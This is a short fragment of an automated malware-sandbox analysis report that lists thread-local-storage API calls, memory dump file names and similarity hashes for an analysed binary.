                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,6FE7AF6E), ref: 6FE80198
                                                                                                                                                                • TlsGetValue.KERNEL32(-00000001,?,?,00000100,6FEAEA54,6FEAEB80), ref: 6FE801B2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE801FC
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000,?,?,?,?,?,6FEA6AC4,6FEADDE0), ref: 6FE8024C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 475ed1206ac7279b083024884f645448ba31d191dd66a659d2644304373791ad
                                                                                                                                                                • Instruction ID: 1f96c20b01bfde3a8e123a0e495e0127cb6aa55f47226d5ef58183225880cd0e
                                                                                                                                                                • Opcode Fuzzy Hash: 475ed1206ac7279b083024884f645448ba31d191dd66a659d2644304373791ad
                                                                                                                                                                • Instruction Fuzzy Hash: 102127712022019FEB205B98E849B967FA9EB83739F24841AEA6DCB391C770E840C710